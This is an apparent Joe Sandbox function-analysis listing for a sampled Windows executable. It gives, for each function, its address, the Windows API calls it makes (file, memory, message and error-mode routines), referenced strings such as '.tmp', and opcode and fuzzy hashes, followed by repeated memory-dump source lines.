Associated: 00000008.00000002.3351353297.0000000000411000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_H1pBxuA3W1wJGbhYT2DZXaLH.jbxd

Similarity

API ID: Message
String ID: $u@$.tmp
API String ID: 2030045667-236237750
Opcode ID: c54dbddafa46f2e22dfffebc81eb5562dc2c172a4bedc3ebd6503997e0ebdf0d
Instruction ID: e9b597bbab03728c2fc5742a4be9a6bd4536e0fffc3524e564be6993971d064c
Opcode Fuzzy Hash: c54dbddafa46f2e22dfffebc81eb5562dc2c172a4bedc3ebd6503997e0ebdf0d
Instruction Fuzzy Hash: 5A41BF30604201DFC315EF29DE91A5A7BA6FB89304B10453AF800B73E2CA79AC01DAAD

Function 00409D41 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 00409D8A

Strings

.tmp, xrefs: 00409DD0
$u@, xrefs: 00409E3E

Memory Dump Source

Source File: 00000008.00000002.3351130180.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3351014734.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.3351243648.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.3351353297.0000000000411000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_H1pBxuA3W1wJGbhYT2DZXaLH.jbxd

Similarity

API ID: Message
String ID: $u@$.tmp
API String ID: 2030045667-236237750
Opcode ID: b1efb6b67be1747eda4a7ae68470655e0e97a08e0c0088af95ee62a76d0ade59
Instruction ID: 325ef343b25d7578ad531e780c27d7eb59b7230534738a93eee9a88be119c5b2
Opcode Fuzzy Hash: b1efb6b67be1747eda4a7ae68470655e0e97a08e0c0088af95ee62a76d0ade59
Instruction Fuzzy Hash: 2C419070600201DFC315EF29DE91A5A7BA6FB49304B10453AF801B73E2CA79AC41DAAD

Function 00409254 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,00409343,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040929A
GetLastError.KERNEL32(00000000,00000000,?,00000000,00409343,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004092A3

Strings

.tmp, xrefs: 00409283

Memory Dump Source

Source File: 00000008.00000002.3351130180.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3351014734.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.3351243648.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.3351353297.0000000000411000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_H1pBxuA3W1wJGbhYT2DZXaLH.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID: .tmp
API String ID: 1375471231-2986845003
Opcode ID: 7647810fba1c1a7df54c129ecd6d2966c744d5805a6f131b99297333171aebfe
Instruction ID: 381de743b5e558d6c5ac88c9815bc56a2e764fefa580558ac3af8d983805238d
Opcode Fuzzy Hash: 7647810fba1c1a7df54c129ecd6d2966c744d5805a6f131b99297333171aebfe
Instruction Fuzzy Hash: 3C214975A002089BDB01EFE1C9429DEB7B9EB48304F10457BE901B73C2DA7CAF058AA5

Function 0040985C Relevance: 4.5, APIs: 3, Instructions: 19
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

TranslateMessage.USER32 ref: 00409865
DispatchMessageA.USER32 ref: 0040986B
PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00409879

Memory Dump Source

Source File: 00000008.00000002.3351130180.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3351014734.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.3351243648.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.3351353297.0000000000411000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_H1pBxuA3W1wJGbhYT2DZXaLH.jbxd

Similarity

API ID: Message$DispatchPeekTranslate
String ID:
API String ID: 4217535847-0
Opcode ID: b7365adf843df27fadcd264289c9e1aacbb46a407697e2479a519a326d32b900
Instruction ID: dcb8165a551d23ec6cf9d75060fcc6b357db24e61cfe11ec0e95f1ebccaeda24
Opcode Fuzzy Hash: b7365adf843df27fadcd264289c9e1aacbb46a407697e2479a519a326d32b900
Instruction Fuzzy Hash: 1AD0C9E269030032E42031721CC3F1B100C0792B28E2415767B02792D3E6BDA550906D

Function 00406F00 Relevance: 3.0, APIs: 2, Instructions: 33
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNEL32(00008000), ref: 00406F0A
LoadLibraryA.KERNEL32(00000000,00000000,00406F54,?,00000000,00406F72,?,00008000), ref: 00406F39

Memory Dump Source

Source File: 00000008.00000002.3351130180.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3351014734.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.3351243648.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.3351353297.0000000000411000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_H1pBxuA3W1wJGbhYT2DZXaLH.jbxd

Similarity

API ID: ErrorLibraryLoadMode
String ID:
API String ID: 2987862817-0
Opcode ID: 280b78466cfb49ac5d1a4d8de4e82968344a77d2278ba686a31885ea79f0a63b
Instruction ID: 61c75ae37e4b7eabf140846b9e9d3e90831ba1beb5fed57b889ca027c52d2016
Opcode Fuzzy Hash: 280b78466cfb49ac5d1a4d8de4e82968344a77d2278ba686a31885ea79f0a63b
Instruction Fuzzy Hash: 49F08270614704BEDB029FB69C6282BBBFCE749B0475348B6F904A26D2E53C5D208568

Function 004075CC Relevance: 3.0, APIs: 2, Instructions: 30
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFilePointer.KERNEL32(?,?,?,00000000), ref: 004075EB
GetLastError.KERNEL32(?,?,?,00000000), ref: 004075F3

Part of subcall function 004073EC: GetLastError.KERNEL32($u@,0040748A,?,?,020003AC,?,00409BAD,00000001,00000000,00000002,00000000,0040A1A4,?,00000000,0040A1DB), ref: 004073EF

Memory Dump Source

Source File: 00000008.00000002.3351130180.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3351014734.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.3351243648.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.3351353297.0000000000411000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_H1pBxuA3W1wJGbhYT2DZXaLH.jbxd

Similarity

API ID: ErrorLast$FilePointer
String ID:
API String ID: 1156039329-0
Opcode ID: 4b4e93de333a3cce642c2996d73c93b1535ff8d1f0695df8178d397978e57373
Instruction ID: cda5b13584bb414d1d7c0d7cef5a43535e1b929ad68122291bf656bee98e9d77
Opcode Fuzzy Hash: 4b4e93de333a3cce642c2996d73c93b1535ff8d1f0695df8178d397978e57373
Instruction Fuzzy Hash: A0E092766081016FD601D55EC881B9B33DCDFC5365F00453ABA54EB2D1D675AC0087B6

Function 0040758C Relevance: 3.0, APIs: 2, Instructions: 30
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadFile.KERNEL32(?,?,?,?,00000000), ref: 004075A3
GetLastError.KERNEL32(?,?,?,?,00000000), ref: 004075B2

Memory Dump Source

Source File: 00000008.00000002.3351130180.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3351014734.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.3351243648.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.3351353297.0000000000411000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_H1pBxuA3W1wJGbhYT2DZXaLH.jbxd

Similarity

API ID: ErrorFileLastRead
String ID:
API String ID: 1948546556-0
Opcode ID: 60e63bc2ff5526e1bd28c8a7098a19329bed0093cf160d1b5924f83231400461
Instruction ID: 6d0e635579d8ef6deec62af0acb898b5effba2491802df9b0589d4017bc118ea
Opcode Fuzzy Hash: 60e63bc2ff5526e1bd28c8a7098a19329bed0093cf160d1b5924f83231400461
Instruction Fuzzy Hash: 4FE012B1A181147AEB24965A9CC5FAB6BDCCBC5314F14847BF904DB282D678DC04877B

Function 00407524 Relevance: 3.0, APIs: 2, Instructions: 24
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFilePointer.KERNEL32(?,00000000,?,00000001), ref: 0040753B
GetLastError.KERNEL32(?,00000000,?,00000001), ref: 00407547

Part of subcall function 004073EC: GetLastError.KERNEL32($u@,0040748A,?,?,020003AC,?,00409BAD,00000001,00000000,00000002,00000000,0040A1A4,?,00000000,0040A1DB), ref: 004073EF

Memory Dump Source

Source File: 00000008.00000002.3351130180.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3351014734.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.3351243648.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.3351353297.0000000000411000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_H1pBxuA3W1wJGbhYT2DZXaLH.jbxd

Similarity

API ID: ErrorLast$FilePointer
String ID:
API String ID: 1156039329-0
Opcode ID: 0dd762855ce75d8d861d21fe55c1929f9bb0fd02210f0b496c114b023f039fab
Instruction ID: cd7afd6369a15af5fc7b0f7528e30ca6696358c0ea2e6c45e94f6e0b4d50a73a
Opcode Fuzzy Hash: 0dd762855ce75d8d861d21fe55c1929f9bb0fd02210f0b496c114b023f039fab
Instruction Fuzzy Hash: 0EE04FB1600210AFEB10EEB98C81B9672DC9F48364F048576EA14DF2C6D274DC00C766

Function 00401430 Relevance: 2.5, APIs: 2, Instructions: 37
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401739), ref: 0040145F
VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401739), ref: 00401486

Memory Dump Source

Source File: 00000008.00000002.3351130180.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3351014734.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.3351243648.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.3351353297.0000000000411000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_H1pBxuA3W1wJGbhYT2DZXaLH.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
Instruction ID: 29306f1da17679ce7d7d3cecb65679b0075e6f6f2ddca0a826851c871ac90975
Opcode Fuzzy Hash: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
Instruction Fuzzy Hash: 57F02772B0032057DB206A6A0CC1B636AC59F85B90F1541BBFA4CFF3F9D2B98C0042A9

Function 004051D0 Relevance: 1.6, APIs: 1, Instructions: 99COMMON

Download Yara Rule

APIs

GetSystemDefaultLCID.KERNEL32(00000000,00405306), ref: 004051EF

Part of subcall function 00404C2C: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00404C49

Part of subcall function 0040515C: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,00405227,?,00000000,00405306), ref: 0040517A

Memory Dump Source

Source File: 00000008.00000002.3351130180.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3351014734.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.3351243648.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.3351353297.0000000000411000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_H1pBxuA3W1wJGbhYT2DZXaLH.jbxd

Similarity

API ID: DefaultInfoLoadLocaleStringSystem
String ID:
API String ID: 1658689577-0
Opcode ID: 9ea3c66d670cb0c44a2644de082ff92dfdb36693542507e19320d23b5394a13d
Instruction ID: c760dbbb10683706500036a577470844d35ac6ab0c013c9c95042e4326961867
Opcode Fuzzy Hash: 9ea3c66d670cb0c44a2644de082ff92dfdb36693542507e19320d23b5394a13d
Instruction Fuzzy Hash: 3B313D75E00119ABCB00EF95C8C19EEB779FF84304F158977E815BB285E739AE058B98

Function 004097FC Relevance: 1.5, APIs: 1, Instructions: 33COMMON

Download Yara Rule

APIs

CallWindowProcA.USER32(FFFF03E9,?,?,?,?), ref: 0040984D

Memory Dump Source

Source File: 00000008.00000002.3351130180.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3351014734.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.3351243648.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.3351353297.0000000000411000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_H1pBxuA3W1wJGbhYT2DZXaLH.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: a87b965038d55eb2d9ec707d066e55bdf6d41d8723524165da3e3c7f4378f603
Instruction ID: d24d13f988e2d8518d188b586964753b5e21f2fcb626312d69a898168728e4f4
Opcode Fuzzy Hash: a87b965038d55eb2d9ec707d066e55bdf6d41d8723524165da3e3c7f4378f603
Instruction Fuzzy Hash: 83F09672614244DBDB54EE6DDD4496B33D8AB89304F10C53EB509A73A1C378DC588769

Function 004074D6 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 00407518

Memory Dump Source

Source File: 00000008.00000002.3351130180.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3351014734.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.3351243648.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.3351353297.0000000000411000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_H1pBxuA3W1wJGbhYT2DZXaLH.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: ce86d0b46b6749cbb1c8065cdd94f6338fa023cacd1506a2c152e65e14b54ccf
Instruction ID: d860c9bcffbd3325f9178b4d72e9b59b5a3ff3896166b15a891a1a6cde46a7a7
Opcode Fuzzy Hash: ce86d0b46b6749cbb1c8065cdd94f6338fa023cacd1506a2c152e65e14b54ccf
Instruction Fuzzy Hash: 6EE06D713442082EE3409AEC6C51FA277DCD309354F008032B988DB342D5719D108BE8

Function 004074D8 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 00407518

Memory Dump Source

Source File: 00000008.00000002.3351130180.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3351014734.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.3351243648.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.3351353297.0000000000411000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_H1pBxuA3W1wJGbhYT2DZXaLH.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 5c7f1f50133f8918f9d70925a1da877e635501982028b62cfe689d085d452769
Instruction ID: d44512077142226ebef1615cfdb59f208ea4aebd3ed4d24446e2b73eb7949d4a
Opcode Fuzzy Hash: 5c7f1f50133f8918f9d70925a1da877e635501982028b62cfe689d085d452769
Instruction Fuzzy Hash: A7E06D713442082ED2409AEC6C51F92779C9309354F008022B988DB342D5719D108BE8

Function 0040693C Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,00000000,00406984,?,?,?,?,00000000,?,00406999,00406CC7,00000000,00406D0C,?,?,?), ref: 00406967

Memory Dump Source

Source File: 00000008.00000002.3351130180.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3351014734.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.3351243648.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.3351353297.0000000000411000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_H1pBxuA3W1wJGbhYT2DZXaLH.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 53f9965764e037d0eade91fd77cfc00c47722664131d9e88e47f7f2d0abdeb71
Instruction ID: a5d31a369ac9c1460ce21b6bb4ed2cb839aeaeb50f5f76e03c39097c5263300d
Opcode Fuzzy Hash: 53f9965764e037d0eade91fd77cfc00c47722664131d9e88e47f7f2d0abdeb71
Instruction Fuzzy Hash: A9E065712043047FD701EA629C52959B7ACDB89708B924476B501A6682D5785E108568

Function 00407628 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040763F

Part of subcall function 004073EC: GetLastError.KERNEL32($u@,0040748A,?,?,020003AC,?,00409BAD,00000001,00000000,00000002,00000000,0040A1A4,?,00000000,0040A1DB), ref: 004073EF

Memory Dump Source

Source File: 00000008.00000002.3351130180.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3351014734.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.3351243648.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.3351353297.0000000000411000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_H1pBxuA3W1wJGbhYT2DZXaLH.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID:
API String ID: 442123175-0
Opcode ID: 2449abf237b154253dcf2b231e0da589e0eb2b5517b9a23d8c49629d5bbf5411
Instruction ID: 68b513bd5595dc6b38f1d245c0222f257f742b1e6f06676187839ef0e6677733
Opcode Fuzzy Hash: 2449abf237b154253dcf2b231e0da589e0eb2b5517b9a23d8c49629d5bbf5411
Instruction Fuzzy Hash: 93E01A727081106BEB10E65EDCC0EABA7DCDFC5764F04547BBA08EB291D674AC049676

Function 004071E4 Relevance: 1.5, APIs: 1, Instructions: 28windowCOMMON

Download Yara Rule

APIs

FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,0040904B,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,Wow64DisableWow64FsRedirection,00000000,00409061), ref: 00407203

Memory Dump Source

Source File: 00000008.00000002.3351130180.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3351014734.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.3351243648.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.3351353297.0000000000411000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_H1pBxuA3W1wJGbhYT2DZXaLH.jbxd

Similarity

API ID: FormatMessage
String ID:
API String ID: 1306739567-0
Opcode ID: 606059c89ae6d8e8cf07aa2f3a49422b1cb7a18355834490beef1a35ac41266b
Instruction ID: 095b59eb22c1ada42cfe979e419102ec0d22498c88dfceb067fba30b4837873c
Opcode Fuzzy Hash: 606059c89ae6d8e8cf07aa2f3a49422b1cb7a18355834490beef1a35ac41266b
Instruction Fuzzy Hash: 8DE0D8A0B8830125F22514544C87B77110E53C0700F50847EB710ED3D3D6BEA90641AF

Function 0040760C Relevance: 1.5, APIs: 1, Instructions: 11fileCOMMON

Download Yara Rule

APIs

SetEndOfFile.KERNEL32(?,02018000,00409F6B,00000000), ref: 00407613

Part of subcall function 004073EC: GetLastError.KERNEL32($u@,0040748A,?,?,020003AC,?,00409BAD,00000001,00000000,00000002,00000000,0040A1A4,?,00000000,0040A1DB), ref: 004073EF

Memory Dump Source

Source File: 00000008.00000002.3351130180.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3351014734.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.3351243648.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.3351353297.0000000000411000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_H1pBxuA3W1wJGbhYT2DZXaLH.jbxd

Similarity

API ID: ErrorFileLast
String ID:
API String ID: 734332943-0
Opcode ID: 2ff8edb08080e924c2b395f282aa3d8258573adb5ced5672aaac345b41159427
Instruction ID: 5d9383f6f08d3e81a9fa52c4aba0b6319cc61be016c813106cdb36ce464f185a
Opcode Fuzzy Hash: 2ff8edb08080e924c2b395f282aa3d8258573adb5ced5672aaac345b41159427
Instruction Fuzzy Hash: 39C04CB1A0450047DB40A6BE99C1A0662DC5A483157045576BA08DB297D679E8009665

Function 00406F5B Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(?,00406F79), ref: 00406F6C

Memory Dump Source

Source File: 00000008.00000002.3351130180.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3351014734.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.3351243648.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.3351353297.0000000000411000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_H1pBxuA3W1wJGbhYT2DZXaLH.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: b3342c3bee8ef6d4bfebdffece25c86b3cab89117035339c57c774ddff03cb9f
Instruction ID: 754ecbd0d3eeca534395493226652c0236480d823d7569c9efe771d01927bad3
Opcode Fuzzy Hash: b3342c3bee8ef6d4bfebdffece25c86b3cab89117035339c57c774ddff03cb9f
Instruction Fuzzy Hash: 97B09B7661C2015DE705D6D5745193863F4D7C47103A1457BF104D25C0D57CD4144518

Function 00406F77 Relevance: 1.5, APIs: 1, Instructions: 5COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(?,00406F79), ref: 00406F6C

Memory Dump Source

Source File: 00000008.00000002.3351130180.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3351014734.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.3351243648.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.3351353297.0000000000411000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_H1pBxuA3W1wJGbhYT2DZXaLH.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 8c0feaa3b8caa60bdda2d34a80aa64328f40d718bb3766066fe9d436f42a4d4e
Instruction ID: 7c61e226393e4972c06343dd54fa3db727d2c771c967085a02b7622724de7152
Opcode Fuzzy Hash: 8c0feaa3b8caa60bdda2d34a80aa64328f40d718bb3766066fe9d436f42a4d4e
Instruction Fuzzy Hash: BAA022A8C00002B2CE00E2F08080A3C23282A8C3003C00AAA322EB20C0C03CC000822A

Function 004068D0 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

CharPrevA.USER32(?,?,004068CC,?,004065A9,?,?,00406CE7,00000000,00406D0C,?,?,?,?,00000000,00000000), ref: 004068D2

Memory Dump Source

Source File: 00000008.00000002.3351130180.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3351014734.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.3351243648.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.3351353297.0000000000411000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_H1pBxuA3W1wJGbhYT2DZXaLH.jbxd

Similarity

API ID: CharPrev
String ID:
API String ID: 122130370-0
Opcode ID: 17375083e06acd4281245791c958798094bb343357575ce1856f87173c3dc77f
Instruction ID: 57bb655d476c0b104ac503b4dc16dcc9cc7d9309af7e6782790f501f1b0aeff9
Opcode Fuzzy Hash: 17375083e06acd4281245791c958798094bb343357575ce1856f87173c3dc77f
Instruction Fuzzy Hash:

Function 00407DFC Relevance: 1.3, APIs: 1, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00407E8C

Memory Dump Source

Source File: 00000008.00000002.3351130180.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3351014734.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.3351243648.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.3351353297.0000000000411000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_H1pBxuA3W1wJGbhYT2DZXaLH.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 173b8e8880a2d8bc8916495ece18949fbab6e5abf9cd9f38168eb99c200b7a3e
Instruction ID: 2791b199587b26d82634b85145401aad68464bde91e43c5b6ac1b5c6de7462a2
Opcode Fuzzy Hash: 173b8e8880a2d8bc8916495ece18949fbab6e5abf9cd9f38168eb99c200b7a3e
Instruction Fuzzy Hash: 7A1172716042449BDB00EE19C881B5B3794AF84359F1484BAF958AB2C6DB38EC04CBAA

Function 00401658 Relevance: 1.3, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,?,00004000,?,0000000C,?,-00000008,00003FFB,004018BF), ref: 004016B2

Memory Dump Source

Source File: 00000008.00000002.3351130180.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3351014734.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.3351243648.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.3351353297.0000000000411000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_H1pBxuA3W1wJGbhYT2DZXaLH.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
Instruction ID: 63c8255cdd02620dd55efc6405714c3c0a63becca9b218cdeda95617091702f1
Opcode Fuzzy Hash: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
Instruction Fuzzy Hash: 3601A7726442148BC310AF28DDC093A77D5EB85364F1A4A7ED985B73A1D23B6C0587A8

Function 004074A8 Relevance: 1.3, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?), ref: 004074B8

Memory Dump Source

Source File: 00000008.00000002.3351130180.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

